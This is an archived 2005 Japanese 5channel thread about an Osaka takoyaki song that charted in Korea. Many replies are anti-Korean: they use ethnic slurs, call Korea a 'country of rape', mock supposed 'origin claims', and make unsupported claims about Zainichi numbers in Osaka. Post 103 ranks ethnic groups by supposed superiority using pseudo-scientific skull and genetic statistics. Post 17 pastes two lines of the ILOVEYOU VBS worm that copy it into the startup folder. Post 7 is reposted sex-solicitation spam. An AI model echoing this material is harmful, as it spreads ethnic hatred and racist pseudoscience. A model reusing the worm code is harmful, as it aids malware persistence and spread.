5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

「たこやきのうた」韓国ヒットチャート突如上位

1 :みなみ記者ψ ★:2005/05/05(木) 09:58:51 ID:???0 ?###

 ◇「たこやきのうた」韓国ヒットチャート突如上位


韓国のヒットチャートに大阪発のCDがランクインした。
「たこやきのうた」で、総合で47位、J−POP部門に限ると4位となり、突然の上位入りに
日本の関係者も驚いている。

CDは4月20日発売され、5月1日付でいきなりランクインを果たした。
現在、「韓国メディアから取材を受けるなど、反響の大きさにびっくりしている」という。
たこ焼きは現在、韓国内でブームになっていて、ソウル市内だけでも100を超す店があるといわれる。

以下ソース:
http://www.sponichi.co.jp/osaka/ente/200505/05/ente180049.html


引用元記事:スポニチアネックス 2005/05/05

2 :番組の途中ですが名無しです:2005/05/05(木) 09:59:19 ID:E7ye9aXq0
きこうでんみさの下ちち

3 :番組の途中ですが名無しです:2005/05/05(木) 09:59:40 ID:Cln4mI6f0
???まじで???

4 :番組の途中ですが名無しです:2005/05/05(木) 09:59:42 ID:H554Vm7G0
>たこ焼きは現在、韓国内でブームになっていて、ソウル市内だけでも100を超す店があるといわれる。

また偽物か

5 :番組の途中ですが名無しです:2005/05/05(木) 10:00:11 ID:ugK01EsI0
> 「お口に青のりついてんで〜」。コテコテの大阪弁の歌が韓国で受け入れられている。

大阪弁の歌が韓国で受け入れられている
 
            大阪弁の歌が韓国で受け入れられている

 大阪弁の歌が韓国で受け入れられている

                             大阪弁の歌が韓国で受け入れられている

6 :番組の途中ですが名無しです:2005/05/05(木) 10:00:43 ID:qa4OD8Hp0
          ∧_∧   ┌────────────
       ◯<丶`∀´>◯ < トクトヌン、ウリタン!
        \    /  └────────────
       _/ __ \_
      (_/   \_)
           lll

7 :番組の途中ですが名無しです:2005/05/05(木) 10:00:55 ID:nGD8tzNS0
266 名前:ゆうじ[y-k.judo-champion.77@ezweb.ne.jp] 投稿日:2005/05/05(木) 00:35:10 ID:xhVVBI3YO
今すぐメールくださいセックスフレンド募集中熟女もOK!

8 :番組の途中ですが名無しです:2005/05/05(木) 10:01:09 ID:dZB324Az0
そのうち、たこやきの起源が・・・

9 :番組の途中ですが名無しです:2005/05/05(木) 10:01:16 ID:7Vogq+AY0
↓以下、関東人の嫉妬をお楽しみください

10 :番組の途中ですが名無しです:2005/05/05(木) 10:01:17 ID:NK/he7bI0 ?##
たこやきの起源説は出たの?

11 :番組の途中ですが名無しです:2005/05/05(木) 10:01:18 ID:9+I0b5uJ0 ?#
>>4
おれは全く知らんかった
キムチ入りとかあるんかな

12 : ◆65537KeAAA :2005/05/05(木) 10:01:31 ID:fzd/amM80 ?
「たこ焼は韓国発祥」と言い出すのももう間もなくだな。

…まさかとは思うが、もう言ってるって事は無いよな?

13 :番組の途中ですが名無しです:2005/05/05(木) 10:01:52 ID:eVgmbLqi0
たこ焼きの起源は韓国にあり

14 :番組の途中ですが名無しです:2005/05/05(木) 10:01:54 ID:m5j25k560 ?##
同胞だもんな。

15 :番組の途中ですが名無しです:2005/05/05(木) 10:01:54 ID:hNCjp4In0
韓国弁の歌が韓国で受け入れられて何がニュースなんだ?


16 :番組の途中ですが名無しです:2005/05/05(木) 10:01:54 ID:VtTGAAeB0
なんであっちってくだらないものにばかり飛び付くわけ?

17 :番組の途中ですが名無しです:2005/05/05(木) 10:02:16 ID:rObRQseV0
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\LOVE- LETTER-FOR-YOU.TXT.vbs


18 :番組の途中ですが名無しです:2005/05/05(木) 10:02:52 ID:6RsG/fI30 ?#
そんでもって 実はたこ焼きは韓国が起源だったとかなるわけで

19 :番組の途中ですが名無しです:2005/05/05(木) 10:02:56 ID:dImNTA5A0
たこたこたーこ たこたこたぁこ たこたこたこやきマントマン
って言う、たこ焼きの歌なら知ってるよ。
何で聞いたのかな。
忘れたけど。

20 :番組の途中ですが名無しです:2005/05/05(木) 10:03:43 ID:wamq2SxI0
>>17
いきなり良スレ認定かよ

21 : ◆65537KeAAA :2005/05/05(木) 10:04:07 ID:fzd/amM80 ?
ま〜いにちま〜いにち僕らは鉄板の〜

ってヤツだっけ?

22 :番組の途中ですが名無しです:2005/05/05(木) 10:04:26 ID:9+I0b5uJ0 ?#
http://www.konest.com/data/gourmet_hot_report_detail.html?no=553

2003年からブームらしいね

23 :番組の途中ですが名無しです:2005/05/05(木) 10:07:33 ID:+G/BYkdI0
トラックバック:http://ex9.2ch.net/test/read.cgi/ad/1115021953/

24 :番組の途中ですが名無しです:2005/05/05(木) 10:08:41 ID:ERaO7Ymj0
まぁ別にたこやきが韓国起源でも不思議じゃないよな
なにせ日本のたこやき起源はあの大阪だから

25 :番組の途中ですが名無しです:2005/05/05(木) 10:16:26 ID:5/HQmJrS0
大阪の起源は韓国

26 :番組の途中ですが名無しです:2005/05/05(木) 10:20:32 ID:xsz+fRPf0
日本でもっとも在日朝鮮人が多いのが大阪府鶴橋

27 :番組の途中ですが名無しです:2005/05/05(木) 10:22:07 ID:zQlqsDBVO
たこ焼きマントマン

28 :番組の途中ですが名無しです:2005/05/05(木) 10:23:25 ID:7oNMMt9W0
たこ焼きはっちゃんの歌しか知らん

29 :番組の途中ですが名無しです:2005/05/05(木) 11:31:54 ID:AoTZuwRT0
また大阪か

30 :番組の途中ですが名無しです:2005/05/05(木) 11:34:07 ID:fYyEH5sG0
クズ肉つこてるから安いんや

31 :番組の途中ですが名無しです:2005/05/05(木) 11:35:01 ID:qhTZKCP20
似たような国だしな

32 :番組の途中ですが名無しです:2005/05/05(木) 11:35:17 ID:9+I0b5uJ0 ?#
たこやきたこやきたこやき〜
たこやき食べーるとー♪

33 :番組の途中ですが名無しです:2005/05/05(木) 11:36:03 ID:P0vKpwxB0
クズ肉つこてるから利益率が高いんや

34 :番組の途中ですが名無しです:2005/05/05(木) 11:39:59 ID:HQ0hOWu70
そもそもタコヤキとは(ry

35 :名無し募集中。。。:2005/05/05(木) 11:45:00 ID:rO+PQErM0
<丶`∀´>大阪民国マンセー!!!

36 :番組の途中ですが名無しです:2005/05/05(木) 11:57:05 ID:tM6iaKTC0
ウリのチジミが起源ニダとか言い出すんだろ。

37 :番組の途中ですが名無しです:2005/05/05(木) 11:57:31 ID:WW62pVcz0
<丶`∀´>
たこ焼きは、植民地時代に強制連行された
わが同胞が大阪で始めた食べ物ニダ。
正確な発音は「タコヤキウルヌン」ニダ。

38 :番組の途中ですが名無しです:2005/05/05(木) 12:01:01 ID:DwSw9bUo0
日本の鯛焼きは、韓国では「プンオパン(鮒パン)」と言うらしい。

39 :番組の途中ですが名無しです:2005/05/05(木) 12:01:54 ID:hkWS8neZ0
韓国って商売人には天国みたいな国だな。馬鹿ばっかりだからカラーヒヨコも新種としてブレイクするだろ

40 :番組の途中ですが名無しです:2005/05/05(木) 12:12:16 ID:wzE3n0hg0
大阪民国 プ

41 :番組の途中ですが名無しです:2005/05/05(木) 12:14:15 ID:lkhmUTMl0
タコヤキは大阪民国起源ですから、韓国起源も納得できる

42 :番組の途中ですが名無しです:2005/05/05(木) 12:19:46 ID:q9nTjQ1D0
前歯にあおのりついてるよ

43 :番組の途中ですが名無しです:2005/05/05(木) 12:27:49 ID:8PdqGP8h0
てか大阪の人口4割程度が在日血縁者であることを考えれば
起源である可能性が低いとは言えないですね
ホルモンとかパチンコみたいに在日の方発祥じゃないんですか?

44 :番組の途中ですが名無しです:2005/05/05(木) 13:15:29 ID:/FXugKCS0
カモメのたこ焼きソングか。懐かしい。

45 :番組の途中ですが名無しです:2005/05/05(木) 16:16:28 ID:revsuGSz0 ?#
いつもながら大阪と韓国は仲が良いな。
いいことじゃないか。

46 :番組の途中ですが名無しです:2005/05/05(木) 16:54:26 ID:B/st/+I40
コッリーナさんが出てたCMの歌ですか?

47 :∈(゚◎゚)∋ ◆UnarPROZi2 :2005/05/05(木) 17:21:59 ID:Kk1fr+v50
なんだかわかりやすいというか納得できる話だな。

48 :番組の途中ですが名無しです:2005/05/05(木) 17:24:22 ID:mWUpPq9/0
たこ焼きウリナラ起源くるー!!


49 :番組の途中ですが名無しです:2005/05/05(木) 17:35:12 ID:eJnkpY0B0
大阪はジャンクフード天国だからな

50 :番組の途中ですが名無しです:2005/05/05(木) 17:37:12 ID:VbhilZct0
横浜だかどこかで
キムチ入りたこ焼きやチーズ入りたこ焼きなる物を売ってる所あるよな?

51 :番組の途中ですが名無しです:2005/05/05(木) 17:39:01 ID:LBeeEenm0 ?#
スキヤキを超える名曲が今ここに誕生したわけだ

52 :番組の途中ですが名無しです:2005/05/05(木) 17:40:05 ID:nCqEcLtj0 ?#
大阪と韓国は同盟国だしアリだろ

53 :番組の途中ですが名無しです:2005/05/05(木) 17:40:58 ID:Yr5W11Wp0 ?#
チョンコ必死w

54 :番組の途中ですが名無しです:2005/05/05(木) 17:41:06 ID:lXir/oBa0 ?#
韓国起源のたこ焼きは大阪でも人気らしいね

55 :番組の途中ですが名無しです:2005/05/05(木) 17:42:29 ID:itB/qgEV0 ?##
たこ焼きの起源も韓国なんだって?

56 :番組の途中ですが名無しです:2005/05/05(木) 17:43:23 ID:eJnkpY0B0
昔は、たい焼きみたいに半球分づつ焼いたのを

パタッ!と合わせて丸くすると思ってた




57 :番組の途中ですが名無しです:2005/05/05(木) 17:44:07 ID:fpxzu0MG0
たこ焼きの起源は日本ですよ。
在日です。

58 :番組の途中ですが名無しです:2005/05/05(木) 17:46:07 ID:nCqEcLtj0 ?#
今家の前で祭りやってるけどたこ焼き8個で500円は高いな
祭りに安さと味を求めるのは無意味だけど

59 :番組の途中ですが名無しです:2005/05/05(木) 17:46:13 ID:F3kcs1mT0
長沢美樹がそんな歌を歌っていたな・・・

60 :番組の途中ですが名無しです:2005/05/05(木) 17:46:23 ID:dMu3XRi+0
また捏造ブームか

61 :番組の途中ですが名無しです:2005/05/05(木) 17:47:13 ID:khdjPvqb0
やっぱり韓国の人は大阪には何か感じるものがあるのかな?

62 :番組の途中ですが名無しです:2005/05/05(木) 17:47:46 ID:PvVx9NmC0
どうせ、たこやきはウリナラ起源っていってるんだろ?

63 :番組の途中ですが名無しです:2005/05/05(木) 17:48:21 ID:FzgvLjhR0
別にたこ焼きとかお好み焼きが韓国起源ってことになっても
あんまりなんとも思わないのは何故だろうか

64 :番組の途中ですが名無しです:2005/05/05(木) 17:48:57 ID:Ydq8+8rd0
やっぱりバ韓国

65 :番組の途中ですが名無しです:2005/05/05(木) 17:50:21 ID:/1BP/95x0
>たこ焼きは現在、韓国内でブームになっていて、ソウル市内だけでも100を超す店があるといわれる。

>以下ソース:


ワロタ

66 :番組の途中ですが名無しです:2005/05/05(木) 17:51:08 ID:eJnkpY0B0
 【たこつぼ】 蛸壷

蛸(たこ)を漁するための漁撈具で、小型のものが多く、
おそらく飯蛸漁を行ったものであろう。

弥生時代以降、大阪府下の湾岸部の遺跡では、しばしば発見される。
また内陸部でも発見される事例があり、松原市内でも数点確認されている。
湾岸まで距離がある本市域で漁を行っていたとは考えにくく、おそらく交易品と思われる。



67 :番組の途中ですが名無しです:2005/05/05(木) 18:11:41 ID:e7fuVCQc0
お好み焼きはすでにチヂミとか何かでパクられてる

68 :番組の途中ですが名無しです:2005/05/05(木) 18:15:45 ID:mKGGKv2V0
★★★ 大阪民国 ★★★
http://tmp5.2ch.net/test/read.cgi/asia/1104114194/

69 :番組の途中ですが名無しです:2005/05/05(木) 18:16:35 ID:7eFEBmn60 ?#
たこ焼きが起源認定される日は遠くない

70 :番組の途中ですが名無しです:2005/05/05(木) 18:29:07 ID:DwJFCpgM0
ウイルスを貼ってる馬鹿って、祖国が日流かぶれの現実を直視できない在日?

71 :番組の途中ですが名無しです:2005/05/05(木) 18:37:33 ID:sWgbhVhk0
      ヽ(´∀`)ノ   たこたこたーこ
         (  へ)    たーこたこたーこたーこたこたこやき
          く       マントマン ♪


72 :番組の途中ですが名無しです:2005/05/05(木) 18:38:35 ID:kp1wPFPn0
関西を出てよかった
逆法則発動だな
母が心配だ

73 :番組の途中ですが名無しです:2005/05/05(木) 18:38:40 ID:j/wVl/AQ0
チョンの地域対立スレですか

74 :番組の途中ですが名無しです:2005/05/05(木) 18:40:46 ID:fOZkS6q/0 ?#
たいやきくん・・・

75 :番組の途中ですが名無しです:2005/05/05(木) 18:41:25 ID:3fqOzWWi0
そのうち韓流たこやきとか日本で出店するぞ

76 :番組の途中ですが名無しです:2005/05/05(木) 18:42:02 ID:2q19ZUbh0 ?##
さすが半身ファン

77 :番組の途中ですが名無しです:2005/05/05(木) 18:45:32 ID:goWQlp8M0
大阪人はメリケン粉で働く

78 :番組の途中ですが名無しです:2005/05/05(木) 18:57:51 ID:z5YXXnPN0
>>2
http://dc.watch.impress.co.jp/cda/weekend/2004/12/10/558.html

79 :番組の途中ですが名無しです:2005/05/05(木) 19:08:00 ID:Sq5HLVDR0
ノックもやるなぁ〜。

80 :番組の途中ですが名無しです:2005/05/05(木) 19:09:20 ID:8HhXTHMg0
たこ焼きの起源は韓国ニダ!
チョパーリはロイヤリティを払うニダ!

81 :番組の途中ですが名無しです:2005/05/05(木) 19:19:02 ID:LaQwaZG50
いま、フジTVでやってるのは
『さらば日本男児・・・結婚したい女たち韓国へ♪』
っていう韓流わっしょい番組。

なぜ日本の男は駄目なのか
なぜ韓国の男性は魅力的なのか
っていうのがテーマだってさ。

関係ないけどたこやきの発祥は大阪じゃなくて明石です。
明石焼きにソース塗ってたこ焼きって名づけただけです。
冷やし中華にマヨネーズつけて別の名前で販売するようなものです。

82 :番組の途中ですが名無しです:2005/05/05(木) 20:16:53 ID:GELn+GEv0
大阪がパクってただけなのか。

83 :番組の途中ですが名無しです:2005/05/05(木) 21:43:51 ID:su4ZIeVi0
ラジオ焼き

84 :番組の途中ですが名無しです:2005/05/05(木) 21:44:58 ID:vGJ4jfq+0
つーかたこ焼きの起源って韓国じゃん
この汽車バカじゃねーの

85 :番組の途中ですが名無しです:2005/05/05(木) 21:45:49 ID:3F08GOyJ0 ?
「がんばれタコ焼きちゃん」のことかぁぁぁぁぁぁぁぁぁぁ!

86 :番組の途中ですが名無しです:2005/05/05(木) 21:46:27 ID:Einybh+90
大阪の歌だからKPOPだろ。

87 :番組の途中ですが名無しです:2005/05/05(木) 21:47:04 ID:dKT9jdav0
たこやきマントマン?

88 :番組の途中ですが名無しです:2005/05/05(木) 21:48:20 ID:95IHvWeE0
○○の起源とか、○○発祥の地ってどこも曖昧だよな

たこやきが韓国ってのは無いと思うけど

89 :番組の途中ですが名無しです:2005/05/05(木) 21:48:27 ID:GgxcMGjV0
お口がろろろ♪や〜けるよはぁ〜♪
カレーライスはか〜ら〜い♪

あ、これはカレーライスか

90 :国家資格保持者:2005/05/05(木) 21:48:57 ID:2bCu5xBB0 ?##
hh

91 :番組の途中ですが名無しです:2005/05/05(木) 21:50:37 ID:MgucwtRT0
たこやきマントマンの歌大好きだった

92 :番組の途中ですが名無しです:2005/05/05(木) 21:50:41 ID:KwglFxLD0
たこ焼きの起源
とりあえずは大阪→将来はソウル
でも、たこの原産地はモロッコですからぁぁあ
残念

93 :番組の途中ですが名無しです:2005/05/05(木) 21:52:10 ID:CNW3MZnI0
きこうでんみさの下ちちと聞いてやって来ました
きこうでんみさの下ちちはどこですか?

94 :番組の途中ですが名無しです:2005/05/05(木) 21:52:22 ID:y3DDReR3O
やりましたな
ノック師匠

95 :(´・∀・`) ◆veyMdjA2J6 :2005/05/05(木) 21:52:35 ID:gfc33CcP0 ?###
たこ焼きの起源で大阪VS韓国の全面戦争勃発

96 :番組の途中ですが名無しです:2005/05/05(木) 22:09:21 ID:Vuwu1nss0
もともと日本には海鮮素材をつかったお好み焼き(チヂミの日本での呼称)はありませんでした。
近年わが国のチヂミを真似してイカやタコを使ったお好み焼きが作られたことは有名ですし、たこ焼きは
海鮮チヂミを円形に焼いたものであり、当然韓国の伝統食文化がその元になっているというのは誇らしいですね。ホルホルホル




とか言い出しそうだな。

97 :番組の途中ですが名無しです:2005/05/05(木) 23:07:50 ID:/mY77JdE0
「たこやきのうた」韓国ヒットチャート突如上位

98 :番組の途中ですが名無しです:2005/05/05(木) 23:09:18 ID:IIyGRDjX0
「Takoyaki」 坂本九

99 :番組の途中ですが名無しです:2005/05/05(木) 23:22:02 ID:GELn+GEv0
韓国人は冷麺に生きてるタコ入れて踊り食いするからな。

100 :番組の途中ですが名無しです:2005/05/06(金) 02:43:44 ID:flZZrvWY0
韓国って日本語禁止なんじゃないの?
そのうち名前変えて起源も韓国発になったりしてw

101 :番組の途中ですが名無しです:2005/05/06(金) 06:09:56 ID:j37/cioc0
>>100
歌のタイトルまではどうかは知らないけど
「たこ焼き」のことを韓国では「ムノパン(タコのパン)」って言うらしい。
「たい焼き」は「プンオパン(フナのパン)」だそうだ。

102 :番組の途中ですが名無しです:2005/05/06(金) 07:05:26 ID:UYYcw4Ud0
>95
アフォか?大阪は元々、ウリナラやねんw

103 :番組の途中ですが名無しです:2005/05/06(金) 07:09:03 ID:vzfnN7m10
大陸や半島から渡来人が多く住み着いた近畿は優秀で聡明な人間が多い
東アジア人の優秀さの序列は 朝鮮人≧華北人>近畿人>その他日本人>沖縄・アイヌ


縄文人と現代人の頭蓋計測に基づくマハラノビス距離では
朝鮮15.8 畿内10.2 九州9.7 関東7.6 東北6.1 沖縄3.7 アイヌ2.8 縄文人0

手掌紋D線3型出現率から求めた朝鮮民族との距離は
朝鮮0 近畿0.007 中部0.012 中国地方0.035 九州0.035 四国0.038
東京0.048 東北0.068 南西諸島0.092 アイヌ0.118

分離型耳垂(いわゆる福耳)の出現率は
朝鮮32.6% 山口36.9 山陰地方37.4 四国41.7 九州44.1 近畿50.1
青森63.3 山形70.5 新潟72.8 奄美諸島77.2 アイヌ96.2

HB抗原の北方型の分布は
朝鮮100% 対馬100 福岡92 鹿児島90 鳥取86 岐阜86 岡山85 大阪79
高知75 新潟68 北海道(非アイヌ)68 東京67 茨城64 栃木61 秋田45

104 :番組の途中ですが名無しです:2005/05/06(金) 07:16:31 ID:0YWN8Yy60
  ∧韓∧   ∧阪∧
 <丶`∀´>人<`∀´ >

105 :番組の途中ですが名無しです:2005/05/06(金) 07:45:51 ID:4pembFMn0
「たこやき」って日本語はそのうちハングルで呼ばれるようになり
起源もいつの間にか韓国になる

106 :番組の途中ですが名無しです:2005/05/06(金) 07:48:59 ID:/l0W4eu50
>>98
まて、Sukiyakiを歌ったのは4PMだ。

107 :番組の途中ですが名無しです:2005/05/06(金) 07:50:54 ID:fuHRiSDC0
たこやきはわかんないけどきつねうどんの起源は韓国だって言ってたよ

108 :番組の途中ですが名無しです:2005/05/06(金) 07:52:23 ID:qH6gV6+x0 ?#
たこ焼きの起源は韓国

109 :番組の途中ですが名無しです:2005/05/06(金) 07:52:55 ID:IJUDdFqU0
たこ焼、お好み焼き、もんじゃ焼きの起源は勧告

110 :番組の途中ですが名無しです:2005/05/06(金) 07:57:34 ID:iRbJTWSw0
また残飯たこ焼き

111 :番組の途中ですが名無しです:2005/05/06(金) 07:57:55 ID:fSWUGDSM0
これはたこ焼きの起源が韓国にされる日も近いな

112 :番組の途中ですが名無しです:2005/05/06(金) 08:07:14 ID:tnb2hYE60 ?#
次に韓国がパクリそうなものを予想する
板が有ればいいのに

113 :番組の途中ですが名無しです:2005/05/06(金) 08:09:11 ID:/vVW9tm40
大阪の文化が韓国と共鳴している・・・・

114 :番組の途中ですが名無しです:2005/05/06(金) 08:10:15 ID:dOdX2G9WO
大阪が韓国気質なのも在日が多いのも認める。だけどひとつだけ気になることがある。
大阪と東京どっちにも住んだことあるけど、圧倒的に大阪の方が目のパッチリした人間が多かった。
本当に大阪はチョンか?
チョンが嫌う産経新聞も大阪が全国一だし、日本で唯一中韓を切捨てるたかじんの番組も大阪だ。

115 :番組の途中ですが名無しです:2005/05/06(金) 08:12:47 ID:aMS7iqwC0
たこ焼きの起源は韓国にあり
http://food6.2ch.net/test/read.cgi/konamono/1092386816/


116 :番組の途中ですが名無しです:2005/05/06(金) 08:13:19 ID:t+wrSaf90
遺伝子的には関東の方がチョンの血が濃い

117 :番組の途中ですが名無しです:2005/05/06(金) 08:15:11 ID:jZC5iQVE0
たこ焼き、お好み焼きは韓国起源だろ。
日韓併合後に来日して大阪に定着した韓国人によってうみだされた。

それ以前の関西風の薄味とは全然味覚違うじゃん。
ソース味の子供にもわかりやすい味。いかにも韓国風。

118 :番組の途中ですが名無しです:2005/05/06(金) 08:15:43 ID:KI3mKKXy0
しらんがな

119 :番組の途中ですが名無しです:2005/05/06(金) 08:15:50 ID:isgPxOPY0
GWにハワイ行ったんだけど
タクシー乗ってare you Korean?ってきかれて
おもしろいのでyesって言ってみたら
運ちゃんいきなり激怒してタクシー降ろされた

120 :番組の途中ですが名無しです:2005/05/06(金) 08:19:24 ID:z14IHCpf0
食い物の趣向まで同じなんだな。あれゲロ玉じゃん

121 :番組の途中ですが名無しです:2005/05/06(金) 08:20:00 ID:dOdX2G9WO
大阪に在日が多いのは確かにだけど、大久保や歌舞伎町を中心とした新宿は日本で一番シナチョンが暴れてる地域じゃないか。
おまえらが嫌っる国内売国奴や頭がピースな人間の聖地は、中央線沿線(国立・阿佐ヶ谷・高円寺)じゃないか。
テレビで活躍してるキモサヨ達は皆東京在住じゃないか。
大阪を見直す必要が、2chにはある。

122 :番組の途中ですが名無しです:2005/05/06(金) 09:38:09 ID:xW/pPa7F0
普通に考えて日本でも見たことないような曲が発売1週でランクインするほど韓国の店においてあるのへんじゃねぇか?
じわじわ人気が出て入荷したってことならまだわかるが
韓国とつながってる大阪(在日)が組んで無理やりヒットさせたんじゃねーの
そのうち韓国でも日本ブームニダ、仲良くするためにも日本は歴史問題を謝罪するべきニダとかいわれるぞ

123 :番組の途中ですが名無しです:2005/05/06(金) 09:39:34 ID:KCAvXKh90
大阪民国=大韓民国

124 :番組の途中ですが名無しです:2005/05/06(金) 09:49:19 ID:2HGVtuXP0
>>120
べつに「たこ焼き」に限らないんじゃない?
「コロッケ」「にぎり寿司」「てんぷら」
「カレーライス」「そば」なんかも
韓国が起源ニダ!っていってるんだから。

125 :番組の途中ですが名無しです:2005/05/06(金) 10:08:52 ID:TDe+3xoV0
たこ焼きって明石焼きからきたんじゃなかったっけ?

126 :番組の途中ですが名無しです:2005/05/06(金) 10:16:47 ID:2HGVtuXP0
>>125
そうだよ

明石(蛸壷漁)→明石焼き誕生→大阪に伝わりソースつけてたこ焼き

127 :番組の途中ですが名無しです:2005/05/06(金) 10:43:07 ID:2HGVtuXP0
NAVERで「起源」で検索してみますた。
ttp://bbs.enjoykorea.naver.co.jp/jaction/list.php?id=enjoyjapan_8&work=search&st=subject&sw=起源

128 :番組の途中ですが名無しです:2005/05/06(金) 15:58:34 ID:LPDdhEok0
やっぱり朝鮮人と同じ民族なんだな大阪人は・・・

129 :番組の途中ですが名無しです:2005/05/06(金) 18:56:28 ID:/vVW9tm40
韓国でパチパチパンチが流行しそうな予感

130 :番組の途中ですが名無しです:2005/05/06(金) 19:32:44 ID:1mELTB470
世界まる見え特捜部で、韓国のテレビ番組でアルゼンチンのとある珍事件を
扱ってるのを紹介された時、韓国のセンスが日本の20年前以前なのが笑えた。

なんだよ、あの安っぽいズラは。
事件の関係者役の全員が韓国顔まるだしで、マッシュルームカットのカラーの
カツラ被って、わざとらしい演技してるし、看板や札の文字が全部ハングルだし、
あれでアルゼンチンの人間を演じていると言われても納得できないぞ。
日テレもハングルにテロップ振るくらいしろよ。普通に読めないから。

つーか、わざわざあんな安っぽい番組紹介するな。
世界まる見えってもっと面白かったはずだが。

131 :番組の途中ですが名無しです:2005/05/06(金) 21:46:44 ID:2HGVtuXP0
>>128
日本の在日の4割がいる大阪と
3割強がいる東京はそうみたい。

132 :番組の途中ですが名無しです:2005/05/06(金) 23:09:08 ID:pPD/975r0
たこ焼きとレイプの国

133 :番組の途中ですが名無しです:2005/05/07(土) 08:35:27 ID:SqnF7sbK0
大阪民国(ダイハンミンコク≒デーハンミングゥ〜)

134 :番組の途中ですが名無しです:2005/05/07(土) 16:59:21 ID:gDaK+LlO0
しかし日本にやってきた在日朝鮮人が作った、って言われれば戦後戦前くらいからできたあれもこれも疑わしくなってくるな。
初めに作った、ってやつ見つけて日本か在日か帰化人か調べなきゃならんのか。マンドクセ・・・
しかし力道山や大山倍達が朝鮮人だったって最近までおれもしらなかったしなぁ。何がなにやら

135 :番組の途中ですが名無しです:2005/05/07(土) 17:34:31 ID:T1uasprGO
仲良しだな

136 :番組の途中ですが名無しです:2005/05/07(土) 17:39:06 ID:Gd72Sb1W0
大阪だからO-POP? 浪花だからN-POP?

137 :番組の途中ですが名無しです:2005/05/07(土) 17:40:07 ID:BkeryrJI0
人に捕られすーぎてー 仲間が無くなーったー

孤独なタコはー 海の底で涙ー(ナミダ)

138 :番組の途中ですが名無しです:2005/05/07(土) 17:41:20 ID:BwM6K4M30
うえええええええええええええええ

これレンタルしたっけ

うええええええええええええええええ

かの国とセンスがイッショかよ

チョチョ っつつ 脳みそ洗いなおしてくる

139 :番組の途中ですが名無しです:2005/05/07(土) 17:42:19 ID:DrvWjlnl0
で、いつ日本政府に謝罪を求めるんだ?

140 :番組の途中ですが名無しです:2005/05/07(土) 17:44:03 ID:yIDItpGn0
たこ焼きの起源捏造の土台を固めにきたか

141 :番組の途中ですが名無しです:2005/05/07(土) 17:51:35 ID:BkeryrJI0
ttp://www.cmo.jp/users/kaien/Midi/Other/Midi_Other_Other.html

24 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)